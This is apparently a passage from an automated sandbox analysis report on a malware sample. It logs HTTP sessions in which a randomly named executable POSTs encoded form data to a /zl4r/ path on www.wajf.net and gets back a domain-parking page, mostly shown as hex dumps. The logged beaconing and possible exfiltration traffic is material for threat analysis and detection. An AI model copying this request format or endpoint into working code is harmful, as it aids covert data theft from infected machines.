                                                        Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
                                                        Sep 26, 2024 15:21:40.928128958 CEST1236INData Raw: 37 39 36 37 33 2c 30 2c 30 2c 31 2c 35 30 36 2e 37 34 37 32 38 2c 36 31 2e 30 39 31 32 36 5a 6d 2d 2e 34 32 30 35 36 2c 38 39 2e 30 30 39 34 48 34 39 33 2e 35 31 36 31 33 61 32 2e 39 32 31 36 39 2c 32 2e 39 32 31 36 39 2c 30 2c 30 2c 31 2d 32 2e
                                                        Data Ascii: 79673,0,0,1,506.74728,61.09126Zm-.42056,89.0094H493.51613a2.92169,2.92169,0,0,1-2.78951-2.92778V74.32242a2.79427,2.79427,0,0,1,2.78951-2.78444h12.81059a2.79433,2.79433,0,0,1,2.78983,2.78444v72.85046A2.92173,2.92173,0,0,1,506.32672,150.10066Zm4
                                                        Sep 26, 2024 15:21:40.929544926 CEST1236INData Raw: 37 37 38 56 34 36 2e 38 38 31 61 32 2e 37 39 32 31 33 2c 32 2e 37 39 32 31 33 2c 30 2c 30 2c 31 2c 32 2e 37 38 33 31 2d 32 2e 37 38 34 37 38 68 31 32 2e 38 31 34 61 32 2e 37 39 32 37 35 2c 32 2e 37 39 32 37 35 2c 30 2c 30 2c 31 2c 32 2e 37 38 36
                                                        Data Ascii: 778V46.881a2.79213,2.79213,0,0,1,2.7831-2.78478h12.814a2.79275,2.79275,0,0,1,2.78613,2.78478V71.95684a67.86317,67.86317,0,0,1,13.37247-1.3949c22.56895,0,32.59679,11.702,32.59679,29.25216v47.35878A2.92116,2.92116,0,0,1,660.23566,150.10066Zm53.8
                                                        Sep 26, 2024 15:21:40.929563046 CEST1236INData Raw: 2c 35 34 33 2e 37 39 39 33 32 2c 32 33 2e 37 33 35 34 31 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 34 37 35 2e 35 36 33 35 37 2c 34 39 2e 35 37 35 76 35 2e 37 33 38 34 36 61 31 2e 33 31
                                                        Data Ascii: ,543.79932,23.73541Z" class="cls-2"></path><path d="M475.56357,49.575v5.73846a1.31017,1.31017,0,0,1-1.31114,1.2452H448.6181a1.24866,1.24866,0,0,1-1.24519-1.2452V49.57666a1.249,1.249,0,0,1,1.24519-1.24688h25.63433A1.309,1.309,0,0,1,475.56357,49
                                                        Sep 26, 2024 15:21:40.931005001 CEST1236INData Raw: 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 37 32 2e 37 31 31 31 38 2c 31 35 30 2e 31 30 30 36 36 48 35 38 2e 36 34 33 36 31 63 2d 33 2e 33 34 33 2c 30 2d 36 2e 32 36 39 2c 30 2d 38 2e 34 39 38 33 35 2d 35
                                                        Data Ascii: ss="cls-2"></path><path d="M72.71118,150.10066H58.64361c-3.343,0-6.269,0-8.49835-5.01409L19.22264,77.24818c-.41888-.8344-.8344-1.11365-1.25327-1.11365-.41754,0-.69679.27925-.69679,1.11365v70.063a2.67991,2.67991,0,0,1-2.64818,2.78951H2.78478A2.
                                                        Sep 26, 2024 15:21:40.931020975 CEST328INData Raw: 35 2d 32 2e 39 32 37 37 38 56 39 37 2e 31 36 37 35 39 63 30 2d 39 2e 34 37 32 37 2d 33 2e 33 34 34 36 33 2d 31 31 2e 32 38 33 31 32 2d 39 2e 37 35 31 36 32 2d 31 31 2e 32 38 33 31 32 68 2d 33 2e 33 34 33 32 39 63 2d 38 2e 30 37 39 34 36 2c 30 2d
                                                        Data Ascii: 5-2.92778V97.16759c0-9.4727-3.34463-11.28312-9.75162-11.28312h-3.34329c-8.07946,0-9.19311,4.45693-9.19311,11.28312v50.00529a2.80594,2.80594,0,0,1-2.64818,2.92778H213.27859a2.80463,2.80463,0,0,1-2.64684-2.92778V97.16759c0-6.82619-1.11532-11.283
                                                        Sep 26, 2024 15:21:40.931036949 CEST1236INData Raw: 36 2c 32 2e 38 30 37 30 36 2c 30 2c 30 2c 31 2d 32 2e 36 34 39 38 37 2c 32 2e 39 32 37 37 38 48 31 37 32 2e 36 30 32 33 33 61 32 2e 38 30 34 31 35 2c 32 2e 38 30 34 31 35 2c 30 2c 30 2c 31 2d 32 2e 36 34 34 38 32 2d 32 2e 39 32 37 37 38 56 39 37
                                                        Data Ascii: 6,2.80706,0,0,1-2.64987,2.92778H172.60233a2.80415,2.80415,0,0,1-2.64482-2.92778V97.16759c0-17.55048,10.44672-26.60565,28.13818-26.60565h3.343c7.80021,0,14.06757,1.81043,18.38655,5.57259,4.319-3.76216,10.72429-5.57259,18.52585-5.57259h3.34329c1
                                                        Sep 26, 2024 15:21:40.931930065 CEST1236INData Raw: 37 34 2e 30 32 33 34 37 2c 31 34 39 2e 36 39 36 32 35 61 34 34 2e 38 36 37 34 39 2c 34 34 2e 38 36 37 34 39 2c 30 2c 30 2c 31 2d 31 30 2e 34 38 31 33 37 2c 31 2e 30 35 31 34 63 2d 31 30 2e 35 35 39 37 37 2c 30 2d 31 38 2e 35 32 37 35 31 2d 36 2e
                                                        Data Ascii: 74.02347,149.69625a44.86749,44.86749,0,0,1-10.48137,1.0514c-10.55977,0-18.52751-6.49547-18.52751-19.73976v-7.557c0-13.24462,7.96774-19.74683,18.52751-19.74683a44.5792,44.5792,0,0,1,10.48137,1.05814c1.37978.32534,1.70512.81151,1.70512,2.11256v5


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.44977744.207.39.65803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:43.251950979 CEST782OUTPOST /zl4r/ HTTP/1.1
                                                        Host: www.wajf.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.wajf.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 225
                                                        Referer: http://www.wajf.net/zl4r/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 6e 43 61 54 77 75 7a 66 63 54 2b 31 35 7a 51 41 61 63 4e 4c 61 74 64 6b 35 64 4c 32 7a 71 6f 59 4b 44 61 63 56 6e 6f 5a 76 76 54 75 44 33 47 56 56 52 72 65 69 4f 68 74 59 6c 4a 56 56 30 35 6b 48 74 73 46 4e 6c 64 72 4a 59 4c 79 77 51 45 62 4a 58 6f 53 65 48 53 45 66 37 41 46 51 6f 44 75 4f 4e 56 6d 4a 6c 30 2f 79 6a 34 6a 33 58 64 68 4b 6d 67 34 42 42 50 50 57 51 64 43 41 6d 6a 4f 57 33 72 4d 38 44 54 4a 57 43 44 76 68 6d 41 78 35 57 43 7a 4d 46 6e 71 4b 6c 39 57 74 48 72 64 61 45 52 62 65 41 46 63 34 47 48 41 77 54 50 6c 31 2b 69 2b 4e 62 64 34 42 79 41 51 57 4a 4f 6b 70 2b 30 38 6f 77 6a 59 63 49 6e 4a 57 7a 4d 63 30 70 72 31 59 36 67 3d
                                                        Data Ascii: wrRLLPUh=nCaTwuzfcT+15zQAacNLatdk5dL2zqoYKDacVnoZvvTuD3GVVRreiOhtYlJVV05kHtsFNldrJYLywQEbJXoSeHSEf7AFQoDuONVmJl0/yj4j3XdhKmg4BBPPWQdCAmjOW3rM8DTJWCDvhmAx5WCzMFnqKl9WtHrdaERbeAFc4GHAwTPl1+i+Nbd4ByAQWJOkp+08owjYcInJWzMc0pr1Y6g=
                                                        Sep 26, 2024 15:21:43.699990988 CEST1236INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 13:21:43 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                        Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                        Sep 26, 2024 15:21:43.700345039 CEST224INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display:
                                                        Sep 26, 2024 15:21:43.700360060 CEST1236INData Raw: 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20
                                                        Data Ascii: flex; flex-direction: column; align-items: center; justify-content: end; width: 100%; padding: 12px 0; margin-bottom: 36px; border-bottom: 1px solid #9
                                                        Sep 26, 2024 15:21:43.701028109 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 2e 63 6f 6d 22 20 69 64 3d 22 6c 6f 67 6f 22 20 74 61 72 67 65 74 3d 22 5f 70 61 72 65 6e 74 22 20 61 6c 74 3d 22 4e 61 6d 65 42 72 69 67 68 74
                                                        Data Ascii: <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Registration"> <svg data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 884 177.95924" aria-la
                                                        Sep 26, 2024 15:21:43.701042891 CEST1236INData Raw: 2c 31 2d 32 2e 36 34 38 31 38 2c 32 2e 39 32 37 37 38 48 34 34 36 2e 35 36 37 37 39 61 32 2e 39 31 38 38 31 2c 32 2e 39 31 38 38 31 2c 30 2c 30 2c 31 2d 32 2e 37 38 36 31 33 2d 32 2e 39 32 37 37 38 56 37 38 2e 37 37 39 33 35 63 30 2d 31 2e 38 31
                                                        Data Ascii: ,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1.67249,0,4.04445.27925,4.04445,2.36893V83.5172C479.861,85.05007,479.02327,
                                                        Sep 26, 2024 15:21:43.702547073 CEST1236INData Raw: 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35 35 32 39 63 2d 31 31 2e 39 38 32 36 31 2c 30 2d 31 34 2e 39 30
                                                        Data Ascii: 5924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.24184h-12.814a2.9212,2.92
                                                        Sep 26, 2024 15:21:43.702564001 CEST1236INData Raw: 32 61 31 2e 32 39 37 38 33 2c 31 2e 32 39 37 38 33 2c 30 2c 30 2c 31 2c 2e 34 32 30 35 36 2c 31 2e 37 35 36 32 36 6c 2d 31 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30
                                                        Data Ascii: 2a1.29783,1.29783,0,0,1,.42056,1.75626l-12.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.7993
                                                        Sep 26, 2024 15:21:43.703864098 CEST1236INData Raw: 30 2e 30 30 34 31 32 6c 2d 34 2e 39 36 34 36 33 2c 32 2e 38 37 30 32 34 61 31 2e 33 30 34 33 34 2c 31 2e 33 30 34 33 34 2c 30 2c 30 2c 31 2d 31 2e 37 33 34 37 32 2d 2e 35 31 31 30 37 6c 2d 31 32 2e 38 32 30 37 2d 32 32 2e 32 30 30 38 37 61 31 2e
                                                        Data Ascii: 0.00412l-4.96463,2.87024a1.30434,1.30434,0,0,1-1.73472-.51107l-12.8207-22.20087a1.25771,1.25771,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path
                                                        Sep 26, 2024 15:21:43.703880072 CEST1236INData Raw: 38 2d 33 34 2e 39 36 34 61 31 31 38 2e 38 36 39 35 36 2c 31 31 38 2e 38 36 39 35 36 2c 30 2c 30 2c 31 2c 32 37 2e 39 39 38 35 35 2c 33 2e 36 32 30 38 36 63 33 2e 32 30 31 36 34 2e 38 33 36 30 37 2c 33 2e 37 36 30 31 35 2c 31 2e 36 37 32 34 38 2c
                                                        Data Ascii: 8-34.964a118.86956,118.86956,0,0,1,27.99855,3.62086c3.20164.83607,3.76015,1.67248,3.76015,3.76216v65.88666C156.57664,145.9213,156.01813,146.75569,152.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.90
                                                        Sep 26, 2024 15:21:43.705300093 CEST1000INData Raw: 31 39 2e 37 38 31 31 34 2d 2e 38 33 34 37 33 2c 32 35 2e 36 32 39 32 38 2d 31 2e 33 38 39 38 36 68 2e 34 31 39 32 32 63 31 2e 33 39 32 38 39 2c 30 2c 32 2e 35 30 36 38 39 2e 36 39 36 34 34 2c 32 2e 35 30 36 38 39 2c 32 2e 30 38 36 33 31 76 39 2e
                                                        Data Ascii: 19.78114-.83473,25.62928-1.38986h.41922c1.39289,0,2.50689.69644,2.50689,2.08631v9.19648c0,2.22458-.4189,3.20028-2.92611,3.61748-9.0518,1.67249-14.48443,2.36894-27.02083,2.36894-13.931,0-33.71044-7.52063-33.71044-34.96235V105.94351c0-21.72951,1
                                                        Sep 26, 2024 15:21:43.705440998 CEST1236INData Raw: 31 2c 31 2e 37 30 35 31 32 2c 32 2e 31 31 32 35 36 76 35 2e 32 37 39 38 38 63 30 2c 2e 38 31 31 38 34 2d 2e 36 34 37 33 33 2c 31 2e 32 31 35 39 32 2d 31 2e 34 35 38 38 34 2c 31 2e 32 31 35 39 32 68 2d 2e 32 34 36 32 38 61 37 30 2e 33 35 35 33 35
                                                        Data Ascii: 1,1.70512,2.11256v5.27988c0,.81184-.64733,1.21592-1.45884,1.21592h-.24628a70.35535,70.35535,0,0,0-10.48137-.56187c-3.81768,0-7.79988,2.1849-7.79988,10.6422v7.557c0,8.45056,3.9822,10.64186,7.79988,10.64186a70.19544,70.19544,0,0,0,10.48137-.5682


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.44977844.207.39.65803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:45.796577930 CEST10864OUTPOST /zl4r/ HTTP/1.1
                                                        Host: www.wajf.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.wajf.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 10305
                                                        Referer: http://www.wajf.net/zl4r/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 6e 43 61 54 77 75 7a 66 63 54 2b 31 35 7a 51 41 61 63 4e 4c 61 74 64 6b 35 64 4c 32 7a 71 6f 59 4b 44 61 63 56 6e 6f 5a 76 76 72 75 44 68 36 56 55 79 7a 65 6a 4f 68 74 51 46 4a 57 56 30 34 6b 48 70 49 42 4e 6c 67 65 4a 61 7a 79 77 7a 4d 62 42 47 6f 53 52 48 53 45 51 62 41 59 55 6f 44 37 4f 4e 6c 71 4a 6d 4d 2f 79 6a 34 6a 33 57 74 68 44 58 67 34 44 42 50 4f 41 41 64 30 57 6d 6a 32 57 78 44 63 38 44 48 6a 57 52 4c 76 69 47 51 78 71 77 57 7a 41 46 6e 6f 4a 6c 39 4f 74 48 76 43 61 45 64 78 65 41 78 32 34 47 6a 41 77 58 2f 2f 75 4b 32 75 61 34 4d 69 56 7a 73 61 5a 59 6e 6c 69 4d 41 64 68 68 6a 5a 44 59 2f 45 5a 44 5a 37 6f 4b 72 4f 4b 71 51 6c 51 58 4e 53 67 2f 69 30 57 59 6d 53 43 6a 5a 67 55 76 43 36 4b 47 65 46 6c 63 45 52 62 47 4f 49 43 57 46 43 62 61 52 68 57 6d 6e 4a 50 49 56 35 34 6c 4b 65 78 72 54 61 61 65 53 6e 31 37 63 43 38 79 6f 43 4d 45 71 61 35 6f 79 4e 79 50 75 72 59 4c 39 34 5a 54 50 76 75 45 71 59 4d 68 39 4c 45 6f 48 37 4c 53 4e 2b 59 45 52 30 44 72 34 66 6f [TRUNCATED]
                                                        Data Ascii: wrRLLPUh=nCaTwuzfcT+15zQAacNLatdk5dL2zqoYKDacVnoZvvruDh6VUyzejOhtQFJWV04kHpIBNlgeJazywzMbBGoSRHSEQbAYUoD7ONlqJmM/yj4j3WthDXg4DBPOAAd0Wmj2WxDc8DHjWRLviGQxqwWzAFnoJl9OtHvCaEdxeAx24GjAwX//uK2ua4MiVzsaZYnliMAdhhjZDY/EZDZ7oKrOKqQlQXNSg/i0WYmSCjZgUvC6KGeFlcERbGOICWFCbaRhWmnJPIV54lKexrTaaeSn17cC8yoCMEqa5oyNyPurYL94ZTPvuEqYMh9LEoH7LSN+YER0Dr4foq5t1l43N9PlrkJeQjQeDQgXW3opbjT7Tyng8+KMkMROdlbbF1D/MeP9fv7Iza5om0vu8uYfKRqMzqYizT4eqGPpewahuTK4g1BvaOGrqxReL7NHxjpG1XG+Hrb/nWIfJgF45ciBLeARtpZ2NsfTQoKCXk+LzX8R2QLmr2qeOK/D0srXTTb8svzKvS8ctIrQ2MzZ0YqcmIuBZkBfC7B477a15HOjNbAWo5F2DbvYcrISGCbv5+m8hKIQNUoggBwbTivwoWeJQx4w5I0X/RlwOotlmDs2mWexTEKWMT1XSd84wyievSvhXjtHwm7R1aHVTgybfLjClmyhmsYVFpFYMtdNHyjELTaQZprRMsF5zrQWy29A+bJE/ZTliFOAwLvJeAKdDEl+ZduemHHkNlzb+5sq7OwK1dA3InDVDquIQ8jxD5A7ZPgimilTzIJ7AmymRDfZlGceM+myHksBzNWEJByRiXqlmMOW61pJLTcB5lVt3Egxow1tvm74mtxrGPsR1qQszzm0D7zsGfTUgUd6RBHFTlGlKPYGXvxfzQJIvlGi06rE33bC6eYtA/n0FQ7M2ZsW7sk41aHT6Eo3X8Xq2y0nZrRsPjc5qgsiQFoL8tTkBQVW4W5AlOtiwahKm1hUPFNMIBlSdD66id4aYEVnyGrGy3jhu5Elw/v [TRUNCATED]
                                                        Sep 26, 2024 15:21:46.244462967 CEST1236INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 13:21:46 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                        Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                        Sep 26, 2024 15:21:46.244488955 CEST1236INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
                                                        Sep 26, 2024 15:21:46.244505882 CEST1236INData Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                        Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
                                                        Sep 26, 2024 15:21:46.245460033 CEST1236INData Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
                                                        Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
                                                        Sep 26, 2024 15:21:46.245474100 CEST1236INData Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
                                                        Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
                                                        Sep 26, 2024 15:21:46.246922970 CEST1120INData Raw: 2e 39 39 30 32 63 30 2c 35 2e 35 37 35 36 32 2c 32 2e 35 30 36 38 38 2c 36 2e 35 34 38 32 39 2c 38 2e 34 39 33 33 2c 36 2e 35 34 38 32 39 48 37 31 33 2e 38 34 34 63 31 2e 38 31 33 34 35 2c 30 2c 32 2e 39 32 34 30 37 2e 36 39 36 34 35 2c 32 2e 39
                                                        Data Ascii: .9902c0,5.57562,2.50688,6.54829,8.4933,6.54829H713.844c1.81345,0,2.92407.69645,2.92407,2.08968v8.63763C716.76805,148.9833,715.93366,149.8214,714.11987,150.10066Z" class="cls-1"></path><path d="M523.55018,5.59211l4.971,2.86822a1.29783,1.29783,0
                                                        Sep 26, 2024 15:21:46.246941090 CEST1236INData Raw: 37 31 2c 31 2e 33 30 39 37 31 2c 30 2c 30 2c 31 2c 35 35 32 2e 32 36 2c 34 39 2e 35 37 35 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 34 38 30 2e 32 34 35 35 39 2c 33 37 2e 38 33 33 39 34
                                                        Data Ascii: 71,1.30971,0,0,1,552.26,49.575Z" class="cls-2"></path><path d="M480.24559,37.83394l-2.8652,4.96934a1.314,1.314,0,0,1-1.761.42392L453.41855,30.40853a1.25423,1.25423,0,0,1-.4569-1.70378l2.86519-4.96631a1.25738,1.25738,0,0,1,1.70849-.45656l22.194
                                                        Sep 26, 2024 15:21:46.248089075 CEST1236INData Raw: 35 36 2e 36 39 38 31 33 2d 31 2e 32 35 35 32 39 76 2d 37 33 2e 32 36 36 61 32 2e 35 36 31 2c 32 2e 35 36 31 2c 30 2c 30 2c 31 2c 32 2e 36 34 35 31 36 2d 32 2e 36 34 38 35 32 48 37 35 2e 36 33 38 36 32 61 32 2e 35 36 31 36 35 2c 32 2e 35 36 31 36
                                                        Data Ascii: 56.69813-1.25529v-73.266a2.561,2.561,0,0,1,2.64516-2.64852H75.63862a2.56165,2.56165,0,0,1,2.64482,2.64852v95.27978A5.5874,5.5874,0,0,1,72.71118,150.10066Z" class="cls-2"></path><path d="M152.81649,147.59344a118.76528,118.76528,0,0,1-27.99855,3
